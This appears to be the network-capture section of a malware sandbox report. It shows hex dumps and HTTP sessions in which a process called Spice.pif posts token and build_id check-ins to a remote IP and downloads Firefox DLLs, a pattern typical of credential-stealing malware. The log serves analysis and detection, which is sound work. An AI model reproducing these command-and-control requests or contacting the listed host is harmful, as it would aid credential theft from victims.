2024-04-30 05:44:04 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-30 05:44:04 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-30 05:44:04 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-30 05:44:04 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-30 05:44:04 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49716	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:09 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:09 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------IDGDAAKFHIEHIECAFBAACont
2024-04-30 05:44:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49717	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:09 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:09 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------BAEBGHCFCAAFIECAFIIICont
2024-04-30 05:44:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49718	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:11 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:11 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------KEGDAKEHJDHIDHJJDAECCont
2024-04-30 05:44:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49719	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:13 UTC	156	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
2024-04-30 05:44:14 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:13 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-30 05:44:14 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-30 05:44:14 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49720	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:15 UTC	156	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
2024-04-30 05:44:16 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:16 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
